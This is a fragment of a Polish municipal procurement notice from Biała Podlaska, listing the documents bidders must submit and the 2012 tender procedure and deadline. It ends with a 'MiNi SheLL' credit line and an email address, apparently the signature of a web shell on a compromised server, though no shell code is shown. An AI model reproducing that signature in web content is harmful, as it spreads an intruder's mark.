<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo (jeżeli dotyczy) powinno być złożone w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza;
2.Formularz oferty.( przy składaniu przez wykonawców oferty wspólnej - jest to dokument wspólny. Dokumenty wspólne składa i podpisuje pełnomocnik ustanowiony przez wykonawców wspólnie ubiegających się o zamówienie).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.bialapodlaska<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta
21-500 Biała Podlaska, ul. Marszałka Józefa Piłsudskiego 3
referat zamówien Publicznych  pok. nr 230.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.10.2012 godzina 10:00, miejsce: Urząd Miasta
21-500 Biała Podlaska, ul. Marszałka Józefa Piłsudskiego 3
kancelaria Ogólna pok. nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com